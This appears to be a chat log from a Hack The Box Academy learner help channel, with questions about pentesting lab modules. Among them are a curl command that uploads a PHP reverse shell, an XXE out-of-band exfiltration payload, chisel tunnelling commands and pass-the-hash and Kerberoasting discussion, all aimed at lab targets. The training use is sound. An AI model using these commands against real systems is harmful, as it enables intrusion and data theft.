#modules
try something simpler first, like a webshell. validate your hypothesis. then, what can you do with a webshell and command execution?
Having issues downloading the flag on tier 0 module 2 'Fawn'. idk if it's an issue but it denies me permission
anyone know by chance?
You need to put /hijacking after the IP address in the browser
You need to verify your HTB account
For screenshots
Fawn is a starting point machine not academy module, read #welcome once you do and follow the steps you should have access to #starting-point
Thank you
Got this. Fixed my problem. It was copy paste issue
How may i verify the account can you guide please
Hi, I'm having issues with the File Upload Attacks module, specifically with the Upload Exploitation section. I can't get the PHP reverse shell I uploaded to connect to my port on the attacking machine.
I have made sure that the IP and port I provide are correct and that the port I listen on with nc is the same as in the script. The pentestmonkey script and the one generated by Metasploit in the module haven't worked for me.
I've been stuck here for about a month and I don't know what else to do. Any ideas or if someone has experienced a similar issue, how did you solve it?
do you have a firewall setup
a month? thats too long. dm me.
I use ufw status and return inactive.
OK
sounds like @mystic light will be able to help
but lmk if you need additional help, a month is too long
Hey does anyone have some good tools for working with keepass? I don't need to crack the password just wondering if there are some cli stuff to work with the db.
cool i just finished the introduction to htb, where should i start learning next?
https://academy.hackthebox.com/paths -> Information Security Foundations path
Oh that's great! Thank you very much!
Do you know how to work with a vhd file?
it's for a virtual machine
Just mount it on a Windows VM, you'll save yourself a lot of trouble..
Hint : it's a windows file that's protected
Yep
I will try windows and I think that john cracked the password.
Hi, I'm in the 'Attacking Common Services' module in the 'DNS Attack' section. I managed to obtain the subdomain 'h?.inlanefreight.htb', but I need some help because when I execute the command 'dig AXFR @h?.inlanefreight.htb inlanefreight.htb', I get the following result: 'dig: unable to get address for 'h?.inlanefreight.htb': not found'.
Because you need to dig @ ip subdomain
Thank you so much @fathom pendant i got the flag
worked like a charm
everybody is different
every module is different
don't worry about how fast you get through a module
just make sure you are understanding everything
Using SSH for the first time got me feelin different
hey guys im on password attack module attacking ad & ntds section
i make a user files and they look like this
but when i run it i get this everytime
is this how its supposed to be?
You should specify the absolute path ./names.txt and you are missing the -p flag before your passwords wordlist
yeah the password was the mistake only here
thanks ill try rn
yep that was the prob, thanks!
Does anyone have insight on the RDP and SOCKS Tunneling with SocksOverRDP module? I'm trying to run the SocksOverRDP-Plugin.dll from the Windows machine, but the file automatically deletes after it is extracted from the .zip file. I checked Windows Defender and it is turned off.
It's bad to base your personal performance and progress based on others. However long it takes you to grasp a concept is fine. Sometimes it's a wording issue with the question that leaves you a tiny bit confused
h
If you still need help, feel free to dm
make sure you are using an elevated prompt
I'm sure I'm missing something obvious, but I'm having issues figuring out the password for the ssh account in the Skills Assignment-Pivoting, Tunneling, and Port Forwarding module. I read the for-admin-eyes-only file, but the phrase in the file isn't the password for ssh. I tried logging into ssh using the id_rsa file and the provided username, but that doesn't work either.
Never mind. I figured it out.
Account Verified. Many Thanks @fathom pendant
what is the event about?
hello guys, can I dm someone to help me with Exploiting Web Vulnerabilities in Thick-Client Applications in the **Attacking Common Applications** module ?
this is the last section i have left and i can't finish it
Hello ! I need help on putting a webshell on the module "Attacking Common Services" on section easy lab "Attacking Common Services - Easy"
So I sent my webshell in PHP and even in ASPX (shell.php and shell.aspx) on the TARGETIP/xampp\htdocs\shell.php directory, and when I try to execute it via my browser it puts me a white page... can someone help me please?
I've struggled on this part to. I've put multiple shells and reverse shells and none work.
Yeah right?
If you figure out anything please let me know lol. That section haunts me in my sleep lol.
This section made me the same... dw I will let you know !
I did the first thick client if you need help with that one. The second one gave me errors.
like you I finished it, but i'm stuck at the second
verify your url, had the same yesterday
Congratz man I'm stuck for so long ! but what URL do i have to check? I sent my reverse shell to the target on https://TARGET/shell and on https://TARGET/xampp\htdocs\shell
curl -k -X PUT -H "Host: 10.129.203.7" -H "Content-type: text/php" --basic -u fiona:9*** -F 'fileX=@/usr/share/webshells/php/php-reverse-shell.php' https://10.129.203.7/php-reverse-shell.php I used this btw and in verbose mode it tells me it sent correctly and when I curl it it's ok !
I tried many webshells in php aspx and a reverse shell but I don't think this is the problem now
I'm blocked for days if anyone could help me.
The target is a windows using XAMPP APACHE.
I have the creds of a SMTP user.
I managed to upload files using curl -X PUT method using smtp creds
I have these info files found on the ftp server: cat WebServersInfo.txt
CoreFTP:
Directory C:\CoreFTP
Ports: 21 & 443
Test Command: curl -k -H "Host: localhost" --basic -u <username>:<password> https://localhost/docs.txt
Apache
Directory "C:\xampp\htdocs"
Ports: 80 & 4443
Test Command: curl http://localhost/test.php
cat docs.txt
I'm testing the FTP using HTTPS, everything looks good.
Can someone help me with broken authentication final skill assessment? I either didn't find the correct user name or role to access the admin panel
I'm taking notes in Notion, but I'm having a problem where the child node is aligned same with the parent node. Does anyone know how to fix this issue in Notion?
Nevermind, I found a hint in the forum
Nope. I'm using markdowns in Visual Studio Code
php shell should work, however I don't think the path you're accessing is the right one
Hi all, is there an admin I can talk to? It is pretty urgent
got a question....
I have tried "Linux Debian". After checking the hint, I typed penguin ....but all these are wrong
(why i cant upload a picture?)
alright, it's in "https://academy.hackthebox.com/module/15/section/35"
Not sure but in a professional setting notion wouldn't be allowed as it saves things to the cloud
Because you need to verify your HTB account via the steps in #welcome to send pictures (it's an anti-spam policy) ; im on mobile rn and don't feel like opening the link, what's the module and question?
hi, in the Bloodhound module, I'm almost certain I've got the correct answer for "Using BlueHound custom dashboard. Which computer has more Administrators?" but it's not accepted. my mistake; I re-ran sharphound and got a different answer that wasn't showing up before.
I also tried the path of Apache xampp server https://TARGET/xampp\htdocs\shell.php but white page when trying to access even with ?c=dir after php for injection... i'm still strying
Nice
i really dont know what to write.....
getting information on a command is "man [command]",
try getting information with "uname" command
he told me just type "uname -a"
and the hint is "it's the name of a bird"
i just..."what the hell"
Oh ok it's this question, uname doesn't give the flavor of the system idk why, but every linux distribution like "Ubuntu" etc has a Animal SYMBOL
@iron canopy Helpful hints for the first thick client challenge on attacking common applications. when dumping the file pay special attention to what the TYPE and SIZE the file is. @modern epoch , pay attention to what the question is asking. for the flag? or password? or something else?
- Module: https://academy.hackthebox.com/module/80/section/782
- Issue: Cyberchef example link leads to an example where gzip doesn't work
- Solution: Gzip has to be manually removed and re-added, or the link to the HTB page to be updated
ohhhh really? thanks!
Hello Vivis! can I get some help as well on my section Attacking common services - Easy lab ?
I can try, I havent done it for a while. Whats the question?
before it I found a user password for ftp, smtp and mysql. so the goal was to find a way to send a webshell or reverse shell but i don't know why it makes a white page every time I navigate to it
Alright give me a minute to spin it up
I am blocked on this for days I would owe you money ! xD
Attacking Common Applications - WordPress - Discovery & Enumeration
Hello guys, please, someone can give me a hint ??? on this question "Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words)."
enumerate the different pages
Well what you're accessing here is webroot/xampp/htdocs/shell.php.
I'd assume you want C:\xampp\htdocs\shell.php though, right?
I have some questions in module "ATTACKING COMMON SERVICES" in section "Attacking SQL Databases" can you send a DM to someone?
Sure. You can DM me if you still need help.
Can someone help me the question "What is the customized version of the POP3 server?"
I solved other questions in this section, but that I can not understand what question means....
Module: Footprinting
IMAP / POP3
Question: What is the customized version of the POP3 server?
Try the classic nmap -sV, or banner grabbing
I tried... submitted version as answer... but not working...
solved. Thanks
Im glad i can help you
Can someone help me? I have a problem in the Password Attacks (Pass the ticket from Windows). I cant connect to the RDP, this one specifically. I can connect to every other RDP or anything else. I dont know if I'm the only one with this problem. I already finished this module unless this content...
@west canopy can you confirm if this is just for this user
What's your command looking like?
hey guys im a beginner in hackthebox, can someone tell me what i need to learn and do in hackthebox to become better at cyber security and learn more
i have 0 knowledge, a friend of mine said use hackthebox to learn IT. but im a beginner and know nothing
the fundamentals of technology is important
check the hint
can you elaborate?
I didn't study the fundamentals courses on hack the box, so I can't speak, but working in the industry and knowing other people it was better to start with tryhackme.com
You have to know how a network works, an operating system, a database, programming in general, how the internet works, etc.
I highly recommend starting with tryhackme.com they have a lot of free stuff and it's also cheap and you'll learn everything from scratch.
This video https://www.youtube.com/watch?v=SFbV7sTSAlA change my life, i started because of this video
Thank you man, I want to learn alot, I have 2 years left to go to uni so I'm trying to prepare and know nothing on IT or cyber security. This will help a lot
There's a few ways to answer you can try connecting to it directly, or by running a version scan with nmap iirc
xfreerdp /v:{IP-MACHINE} /u:Administrator /p:AnotherC0mpl3xP4$$
There are also intro to {service} modules afaik. Footprinting module deals a lot with connecting and handling/leveraging common services
Try putting the pass in quotes if it's still failing
still not working
Sometimes with special characters you may need to either put in quotes or use a backslash
For instance \$\$ because $ in bash indicates a variable call
Np :)
It helps to recognize certain characters as potential fuckery for commands
!,$,&,>,<,?
They may need to be escaped with a backslash
Or the whole string in quotes
' should always work. If you use " or no quotes at all, you need go escape special characters.
Someone nudge on Attacking Common Services - Easy? Got USN F* but can't brute-force password for FTP or pop3, I thought the hint was leaning towards SMTP server type deal -- Used PW.list and rockyou we're an hour in rn with 48threads
- Module: Insecure Token Handling (https://academy.hackthebox.com/module/80/section/784)
- Issue: link does not work (https://academy.hackthebox.com/course/preview/file-inclusion--directory-traversal)
- Solution: Replace with valid (e.g. https://academy.hackthebox.com/module/details/23?redirect_to_section=1494) link or remove the sentence "You can learn more and practice this attack by studying the File Inclusion / Directory Traversal module.".
--When I try ftp brute with medusa I keep getting Server 550 msg and brute-force stops
Hi, I have a question about If I want to start a capture without hostname resolution, detailed output, showing ASCII and hexadecimal contents, and take the first 100 packets; what are the switches used? Please answer in the order in which the switches are requested in the question.
I have tried several ways but I have no correct answer I have read the documentation.
Module Intro to Network Traffic Analysis
this fooled me for a bit. try reducing your threads when you attack ftp. -t 1
Gotcha, is that even realistic though
Like is it realistic to ever need to brute force with -t1 because even with t-1 if account lockout is low it doesn't matter lol
@autumn pilot sudo tcpdump -rXX /tmp/capture.pcap Reading the recent documentation but I see why I have done the test and it does give me the correct information but at the time of the answer it is incorrect.
it is expecting one switch (parameter)
if you carefully read the question again, you will be able to find the answer using even with the manual that I've linked
@autumn pilot I think the answer I am applying is correct, what I think is wrong is how I am applying it.
if it is not getting accepted, then it is not the expected one
@autumn pilot You are right
yo
i mean... all ctfs are contrived examples based on real world misconfigurations, right? but account lockout is different than login throttling. throttling is reducing the amount of simultaneous or repeated attempts by rejecting new logins. where a lockout is "youve tried unsuccessfully too many times, an administrator must unlock your account (or wait an hour before the next attempt)."
i was managing a security team where a pentest was conducted and the attacking team just did a low and slow ping from various ip's, just under what would trip the account lockout. 3 here, 3 there, 3 there or whatever. they eventually found a valid password but were thwarted by MFA.
so there is utility to it, but i will concede that it is definitely a contrived example, and if your pw is in the ass half of rockyou, youre gonna be waiting around for a while.
noice
@autumn pilot I believe that when the questions are complex is when you learn to memorize concepts the most.
-t 4 is fine up to 16 iirc
good to know, i just reduced to 1 and did something else lol
Like if you wanted to sim rl... Then yeah you'd need to reset the lab a couple times
With -t1
shoutout to @mortal basin, this modules are dope
Hi all (my turn) Currently on the last official question on the Passwords Attack module on the passthehash section. The question is:
Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
I am logged in as admin on RDP and have used Julio's hash (confirmed through mimikatz. I can get the command to execute on DC01 but don't get any reverse shell. Been on this for hours and tried a number of different rev shells:
Any help is appreciated
Someone PM a hint on getting the webshell on Attacking Common Services - Easy. Exploited FTP with USN and PSW and uploaded a shell (i think) and can't seem to get anything back from it
now that you discovered that password, throw it around to other services! maybe the user repeated it someplace else....
how'd you create that payload? what IP and port?
I have used the recommended revshells. My port is 4444 and the IP is my tun0
tun0 of your machine or some IP of the host you RDP'd to?
Sorry - my mistake - habit. The IP of the MS01 that I am RDP'd on to
well, which one?
Did I not just say? It's the ip of the target I'm currently rdp'd on to. Unless you want the actual ip address?
no no, run ipconfig. you'll figure out what I mean. a machine can have multiple IP addresses
Yes it can and it does. I did try the secondary IP address with no luck.
it problably in this subnet 172.16.5.0/23
DC = 172.16.1.10 2nd IP Client 172.16.1.5
it has a public IP address (the one they gave to you), and an internal one. DC01 is only able to reach the internal one, so you definitely need that one. should be like 172.16.x.x
If the internal IP doesn't work, dm me. I'll take a closer look then to figure out what else might have gone wrong
Just tried it with the internal IP with no luck.
ugh
I'm definite I tried it earlier as well
Let me DM you π
If you have some time
sure π
Hi, I'm having an issue in Bypassing Security Filters exercise of Web Attacks. It looks like the skill assessment is somehow broken. I'm supposed to put something in an filename input and press RESET. Looking at the call in BURP, the value in the filename is nowhere to be found.
Or maybe the wrong machine is spawned? It always shows me the flag from the previous exercise
The input and the button are in different forms
dont hit the button just hit enter. its just bad ui.
I'm still lost. I found the method which isn't recognized as malicious request and expect now to see the flag file, but I don't
dm me we can jam on it, i just did it to refresh memory
thx
For the Skills Assignment-Pivoting, Tunneling, and Port Forwarding, how did you transfer mimikatz to the target pivot machine to dump the credentials? I tried scp from my attacking machine and using powershell from the target machine, but it doesn't connect. I'm executing the commands using proxychains and am able to RDP to the target machine I found through autoroute.
It hasn't been updated in 4 years, whether it's archived or not, nothing has changed. There's also EyeWitness.
You can copy/paste if you're using xfreerdp.
I use gowitness. Works just fine.
aquatone isn't necessary ¯\_(ツ)_/¯
when gowitness implemented the server feature
someone else having connections issues with the academy?
same here "500 SERVER IS NOT FEELING WELL"
yup
Yeah I can't log in either
it's part of the box
haha
yup, same, error 500
makes me wonder if it was hacked
Hi every1 is there any issues with academy server >>>throwing http-code-500 ???
same here. can not do academy...:(((
same
same
up !
Sheeesh
Is academy dashboard down for anyone else?
Nvm. I see some other people are
You're not alone
Looks like everyone is having the same issue
Well anyways, how is everyone's day/night going?
Pretty good. Just watchin Grimm atm
I feel like shit but it's kinda like a normal morning
AD Enumeration & Attacks - Skills Assessment Part I . I am having hard time with the question 6. It is asking t*** user's cleartext password. I am connecting MS01 with rdp over proxychains but when I try secretsdump.py and mimikatz.py I am getting this error
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.5.50:445 <--socket error or timeout!
[-] [Errno Connection error (172.16.5.50:445)] [Errno 111] Connection refused
I tried both of these with chisel but non of them work ----./chisel.exe client -v 10.10.X.X:1234 R:socks ------- ./chisel.exe client 10.10.X.X:1234 R:139:127.0.0.1:139 R:445:127.0.0.1:445 R:3389:127.0.0.1:3389. Any ideas ?
it happened to me
yep, lol
ironically i was feeling under the weather today
so now I feel like the universe is trolling me
ah
Informed the team, might take a minute due to the late hour
will share any updates when i have them
Thanks.
doubt it, since that'd be time out errors, rather than 500
Will share what information i can when i have more
NMAP module from HTB Academy says an "NMAP Connect Scan (-sT) is also useful when the target host has a personal firewall that drops incoming packets but allows outgoing packets. In this case, a Connect scan can bypass the firewall and accurately determine the state of the target ports. "
I find this confusing because if the firewall drops incoming packets (the initial syn packet) then the firewall wouldn't send an outgoing (syn-ack) anyways. So why is it saying a connect scan can bypass a firewall?
In the heat of the night
English please?
Sorry
All good
It works and then it doesn't
Hey all, just had a query with the SNMP Footprinting exercise which asks you to enumerate a script and submit its output as the answer, now I stumbled across the answer by going for a walk, however I am curious how it's "meant" to be done. Can Braa be used to brute force OIDs for x.sh and can you then somehow execute a script from an OID.
Walk is intended answer route
oh it is? Cheers Marcie - just didnt seem to really 'match' what the question was hinting at
how to do this , i am using ffuf and seclists as a wordlists ----Don't forget to remove copyrights from the wordlist, they clutter the results!
thanks
Hi guys please help me.. I have this weird problem in #WEB ATTACKS - Blind Data Exfiltration
I am able to get any file except from the file they asked for in the question...
What is missing??
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://MY_IP:8000/327a6c4304ad5938eaf0efb6cc3e53dc.php">
%remote;
%oob;
%content;
]>
<root>&content;</root>
Dm me if you still need a hint
Dm me if you're still struggling. I can take a look
Hello guys i just have silly question is there a way i can know machine tags? for example MetaTwo has XXE, sqli etc? or if the machine has web app?
I'd assume what they mean by this is:
If a port is open, it will reply with an ACK. The firewall won't block that as it would be disrupting the service.
On other ports it'll drop the SYN, so nmap will get no reply. It'll then retry to rule out packet loss.
If it's no packet loss, you can safely assume the port is filtered or closed.
The firewall may also reply with some ICMP stuff, which nmap will once again interpret as port filtered.
%content is not referring to any thing i think
I am doing Kerberos attacks module, I am currently at the Kerberoasting question. What is Adam's password, a Kerberoastable account? I identified 3 user account.. but the Adam one. Can someone provide me with a nudge?
I think NPUser's is for ASREPRoasting, GetUserSPN is for Kerberoasting
ohhh shit @steady hawk Thanks! I used the wrong script
Hello anyone could help me out with lfi module
sure, which section?
Automation one
Which question
I found the parameter and found many paths but I don't know how to get to race from there
Which question mate, then I can take a look at mine notes
Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt
Use ||LFI-Jaddix|| wordlist ; )
That I did it I found many paths now what I think is go through log poisoning maybe?
Use that to read the flag ; )
Okay thanks a lot think I know what to do
I thought it was the answer to this question, but it's not... sudo tcpdump -i eth0 -rXX /tmp/capture.pcap Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches) lol module tcpdump fundamentals
Can someone help me with the question I'm stuck
I gave you the link to the manual, you need a simple search to do
I'm reading the documentation but it's so hard
you can also use hexdump to look at pcap files
But it will display the content in hex ascii
i think you can decode it
The question itself is not difficult but I think the most complex thing is to make the correct practice, in the manual the -r switch says "Read packets from file (which was created with the -w option or by other tools that write pcap or pcapng files). The standard input is used if the file is ``"-'' and the switch XX When parsing and printing, in addition to printing the headers of each packet, it prints the data of each packet, including its link-level header, in hexadecimal and ASCII.
if you search for Hex and ASCII you will find the answer
-XX When parsing and printing, in addition to printing the headers of each packet, it prints the data of each packet, including its link-level header, in hexadecimal and ASCII.
And doing a correct practice of the switches would be sudo tcpdump -rXX /tmp/capture.pcap
close ||sudo tcpdump -Xr /tmp/capture.pcap||
isn't correct
no yet
First it would be to read from the capture and then display the hex ascii content.
whyyyyyyy is good
@autumn pilot But I tried several times that command and I got failure
@autumn pilot I mean it should display the content first in hexa and ascii and then read the capture to display the content?
hi
this is the community for hackers?
The bytes of the capture is represented in hex and ascii
This is an Oprah Winfrey fan club
?
guys is black arch better than kali
when it comes to pen testing/ hacking
Whatever you like best is what's better
btw do you know any tool that is very secret or very low no. of people knew about that
Yeah sudo written in rust
btw im new in hacking world
if anyone can teach me something about hacking than it would be very good for me
also im planning to get a server and i wanna do some pen testing on it before i put it to actual use
btw anyone knew how to hack any device without coming in contact with that device in physically
is this safe link?
Challenge accepted
@glacial hazel I think it's more like organizing the switches in order to execute them correctly because I've read a couple of times the manufacturer's documentation and it explains it in simple terms
What are you trying to do?
I'm learning tcp fundamentals
Module Intro to Network Traffic Analysis (fundamentals tcpdump)
Are you trying to display the contents of a pcap file in hex and ascii?
yes
hexdump -C <file>
Ok
It is a bit overwhelming all the information because I have to study it little by little.
yes
I am now with the following question but I am thinking about how I should arrange the switches so that it accepts the response
sudo tcpdump -nvvXc 100 but so hard And yet the question indicates that they should be organized as requested in the statement.
This isn't a question in how to complete the activity just was curious about getting to the answer. In the Password Attacks - Credential Hunting in Linux ||why are the creds you are looking for contained in someone else's personal configs? i feel like the activity took me longer because the last place i'd think to look for user B's creds is in user A's personal configs. I guess in the future i should assume someone's creds could be in anyone's personal configs||
Shared creds. Sometimes leaps of logic are required to connect to things. But on a logical side of things: say user A is an IT admin, it would make sense for them to have other user creds in order to verify they work in the event that user B loses them and needs a new copy
also humans just be dumb and its not weird for coworkers to have each others passwords even if theres no actual good or authorized reason for them to have it
"Hey I know youre out of town but I need that file you were working on."
"Np, password is P@$$w0rd! lol"
"Thanks! I wrote it down just in case!'
"Sounds good"
^
Even when things are explicitly against policy, humans go "lol ok but I need this done"
im on attacking module and on creds harvesting windows
i am supposed to transfer a file from a attack host to target
through rdp, im on remmina rn and idk how to do it
cant finda any potions
options
i can use smbserver.py but i wanna see how to do it through rdp
thanks :D
Not sure with remmina but iirc if you add, /drive:<any name>,<full filepath or ./ For current> to mount a share when you connect
But I'm sure there's a Remmina option to mount a filepath
With xfreerdp*
Yeah there's an option in Remmina GUI "share folder"
I get that but ||everyone has their own mozilla profile where creds are stored. my reasoning was one user gave the other user creds to login but they saved the creds ||
im on pw attack and on question find the default pw
for every new account
and i cant find s*it
i tried running the script
and the cmd
and looker around
but no lol
looked*
idk whatelse to do
pop a cmd prompt and run the onlineliner in the module.
Hello, I have a question about the "Skills Assessment - Using Web Proxies" module on CBBH path, last question I need to capture the request sent by Metasploit. I have no problem doing it with burp suite so i already have the answer, but i can't find a way to catch it with Owasp Zap, there is a previous exercise in the module where i had the same problem. Can't we do it with zap ? I enabled my 127.0.0.1:8080 proxy in zap options but nothing is captured when I run metasploit exploit.
guys hello ive just came here i need your help immediately how can i delete my data from the internet
if i delete social media and email accs does that really deleted?
uh
Sounds like a question for reddit
Hey - So I think I know the answer but if a module is updated I need to complete to 100% again before I take exam once I'm completely done right?
Hi lads, if any one knows the answer for this, in evil-winrm when we execute the command "download" from target machine to download it to our attacker machine, i cannot seem to find the file in my attacker machine, any idea where it is actually downloaded?
I'd assume your current directory lol but you could just use the find command for it
Yea, it should be in the directory in which you launched evil-winrm from
Where is it lol
nobody knows
dog lol
upload works just fine.. like put the file in the same directory as evil-winrm and it uploads..
maybe check ls -alh or whatever and see if it's hidden for some reason
tried that as well , no luck in finding it
this is not the first time i face this, it happen always.. download does not work accordingly
Either of you guys know this?
no idea
It's okay, Marcie here for the rescue
It's not really deleted. Digital footprints. But this isn't the place for that conversation please read #rules and #welcome you can ask in #1024429874246590575
You may be able to ask support about that one on the site. I think it heavily depends. But I think most of the updated modules are completable
I'm not familiar enough with winrm to help
It should be the filepath you're currently in
But Im not 100%
From documentation:
```
Notes about paths (upload/download): Relative paths are not allowed to use on download/upload. Use filenames on current directory or absolute path. If you are using Evil-WinRM in a docker environment, bear in mind that all local paths should be at /data and be pretty sure that you mapped it as a volume in order to be able to access to downloaded files or to be able to upload files from your local host O.S.
```
That actually worked, using full paths, thanks Marcie!
Anybody know what's going on here?
I'm stuck on module ATTACKING COMMON APPLICATIONS: Splunk - Discovery & Enumeration
when I went to Splunk's port it says "The connection was reset"
try https
@acoustic owl you recently finished the NoSQL injection module, I'm hitting a blank on skill assessment 1. Any hint for what I should be doing?
Burp Intruder is a good friend in this case
Hrmm. I used that and I've got it to login, no issue, but just a bit puzzled as to what to do afterwards
Send me a DM
If you do it right, you should get the answer directly in Burp
i did
got bunch of crap
lol
doing AD: Living Off the Land
Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.
any help ?
i got a bunch of cache files etc
I can take a look. Don't have notes on it, so give me a moment to recreate it
did you run it from C:\ and read all of the file names
sure thing
Hello everyone
Please help with the LINUX PRIVILEGE ESCALATION module.
I have a task where I need to find 2 files that contain SETUID bits and write them as an answer.
I found 2 files in the system, but only one is suitable, what am I doing wrong?
i haven't run it from c:\
htb-student@NIX02:/usr/lib/snapd$ find / -uid 0 -perm -6000 -type f 2>/dev/null
/usr/lib/snapd/snap-confine
/usr/bin/facter
htb-student@NIX02:/usr/lib/snapd$
Help me please
one is suid, one is sgid
And what do I need to do to get the second file?
read the module, understand the difference between suid and sgid, run the commands in the module. please read the questions carefully.
Hello, I am in the "KERBEROS ATTACKS" module, in the "Kerberos Authentication Process" section, regarding the (AP-REQ) Application Request part. I believe there is an error in the diagram: the content of the TGS (Ticket Granting Service) ticket is encrypted with the service key, not with the new user/service session key
i can't find it bro, i tried a couple, there are hundreds of files in the output....
there are two questions in that section, you have found one of the answers, and don't forget to submit the answer as the full path
OK, I'll try, thanks!!!!!!!!!
anything yet ?
it's not bs. you aren't reading the file names, my dude. this is what enumeration is. read everything, one will basically spell out its function.
yeah got it working. it ain't pretty but it works. feel free to dm me
yeah, i just get annoyed sm
because some sections through this path were really unnecessarily complicated
and i get stuck for hours....
password attacks is one of the roughest modules fr
not only this one, but the other ones too in pentesting path...
i don't mind getting stuck and shit but sometimes it's just too much
like it takes a day just to do one section...
ok dm me i'll walk you through it
i found the pw
and you'll slap yourself in the forehead i'm telling you
yeah bro it was the first one
it's just i got like 1000 of them outputted
and i couldn't scroll all the way up
so i had to put that shi in a file and read it..
In the Active Directory Enumeration Module, Kerberoasting - from Windows section, I'm having issues with the following command: New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
PSArgumentException
TypeNotFound
zonetransfer.me is the domain from which you request a zone transfer and nsztm1.digi.ninja is the Nameserver that you request
@naive field fr... but mostly it's because maybe your machine doesn't have enough resources
i'm on pwnbox so ig yeah, makes sense
I brute-forced the domain via dnsenum... but I cannot find the FQDN for .203.... Can someone give me a hint or help me?
M: Footprinting(DNS)
Q: What is the FQDN of the host where the last octet ends with "x.x.x.203"?
if i remember you need to find the subdomain that allows a zone transfer, and then brute force this subdomain, and i think you can use the subdomains-top1million-5000.txt
spent a lot of time on this one ^^
Btw I have a question about the "Skills Assessment - Using Web Proxies" module on the CBBH path. For the last question I need to capture the request sent by Metasploit. I have no problem doing it with Burp Suite, so I already have the answer, but I can't find a way to catch it with OWASP ZAP; there is a previous exercise in the module where I had the same problem. Can't we do it with ZAP? I enabled my 127.0.0.1:8080 proxy in the ZAP options but nothing is captured when I run the Metasploit exploit.
You could capture it with Wireshark
well it works with Burp Suite, but i wanted to make it work with OWASP ZAP too
Use the smallest list. If you don't find anything with it, use the next bigger list
can't find the reason why
Two reasons
First, the number of requests to a DNS server may be limited.
Second, not every list contains every entry
@jaunty sail is talking about the reason why they can't capture the request with zap
oh, okay
i started the http python server on my machine
but when i try to wget from ssh i get this
wtf
what command did u use to start the server
its working now
based
Default port is 8000 if you just ran python3 -m http.server. I was going to say it looks like you might have forgotten http://IP:port/
yeah that was the prob i think
thanks
!!
i kinda feel like im the most boring person in this channel xd
i ask all the time..
Nah, it's a learning experience, so don't be afraid to ask. But if you can google it first and try to find it, that's worth its weight in the skill. I'd say figuring out how to google things the right way can really come in handy in the future.
yeah, i just feel i get stuck a lot more than other ppl here :D
Is the 1'000 cube (approx. 90$) justified for the OSINT corporate Records course? Anybody would recommend or think there is similar but cheaper material?
Hmmm I did the PowerView module.. it's decent but tbh I expected a little bit more from it
If it bothers you at all you should ask yourself why you get stuck. It sounds stupid, but that's how I approach things now. Like if you do an AS-REP roast. Why will it work on one account vs another? What's the setting that enables this and why would it be enabled? Why is it a valuable finding? Sometimes you just have to go out and research the concept despite the material you're provided in academy.
Module Active Directory PowerView
Section Enumerating AD Groups
Q. Find the member of the Remote Management Users group on WS01
.\SharpView.exe Get-NetLocalGroupMember -ComputerName WS01
Doesn't show members of Remote Management Users
Tried using a different approach
.\SharpView.exe Get-NetGroupMember -GroupName "Remote Management Users" -ComputerName WS01
Still no result
Hi! Can anyone assist me with Predictable token reset? Currently stuck here. (Nevermind)
One month of a platinum subscription and the price drops drastically
@acoustic owl have you done that module? Active Directory Powerview
Yes
Can I DM you?
sure
#Windows Privilege Escalation
#Section: DNSAdmins
#Using Mimilib.dll
I've been able to recreate all of the examples in the lab. All except the Mimilib.dll method mentioned. I read the URL link provided, but it doesn't give much detail into this attack method other than mentioning kdns.c(adding system command). Am I supposed to compile this and run the binary on the host? Do I have to compile mimikatz and run it with a special command? Can anyone offer more details?
Anyone do the Network Enumeration with NMAP module yet? I'm stuck on the Firewall and IDS/IPS Evasion - Medium Lab
I can't make anything out of the Intercepting Web Requests section in Using Web Proxies. I can't seem to get Zap to work at all and when I try to forward requests in Burp Suite, nothing happens. Anyone else run into these issues in this section?
It just keeps taking me back to hitting the ping button and when I change the 1 to ls and hit forward, it's just a blank window.
I tried in the pwnbox as well and it does the same thing.
You still need help?
Yes
This one is deceptive. It's a lot simpler than you think too. You're probably using -sS and -sV but think about what DNS runs on. It can run on two types of protocols. One which is connection oriented (TCP), and one other one. What's the other one?
Give it a shot and see what happens. The only way you'll know
Its just stuck right now lol
$ sudo nmap -sU 10.129.2.48
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 19:59 EDT
LOL you're gonna be there for days with that scan! Remember UDP is the slowest to respond when scanning, so you want to have target ports in mind (in a best case scenario). Think about the question. Think about the information already provided to you. You can tighten that scan and make it more efficient instead of so broad.
You're so close man.
PORT STATE SERVICE VERSION
53/udp open domain NLnet Labs NSD
That's what I get, NLnet Labs NSD, but that's not the right answer
Here's the command I used - sudo nmap -sU -sV -p 53 10.129.216.96 --script dns-nsid.nse
You're so close! Think about how you can make that simpler. Sometimes you don't need fancy things to get information. Cut something from it
I'll cut the script and try again
I cut the script, I didn't change much. I think I cut the -sV and got the below. I can't cut much else lol
PORT STATE SERVICE
53/udp open domain
DM me
Can someone give me a hint for the question below? This question is harder than other modules as I am not a native English speaker... Some questions are hard to understand in terms of what is being asked for... Submitting a flag is much easier...
M: DOCUMENTATION & REPORTING(Notetaking & Organization)
Q: What tool mentioned in this section can make logging a session easier?
I'm stuck on the Credential Hunting in Linux section of the Password Attacks module;
I've tried mutating the given password for Kira several different ways and have gotten nowhere, any hints?
edit: nevermind, case sensitive username
They are just asking for the name of a tool that was discussed in the chapter. One that has shell session logging capabilities
Go through the section, get the names of the tools they talk about, figure out which one has anything to do with sessions.
Never mind. It's just really really slow. I got the flag.
hello guys, anyone taking Pentester path and on getting started module? Need help on something please
I thought "tmux-logging" is the answer... but incorrect.... I am not
That's ||not the name of the tool. That's a command to configure the tool. What is the tool called?||
pet peeve: just ask the question.
this is the task: Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'. - are you familiar with this?
getting started - privilege escalation section right
yes!
what is the question you have
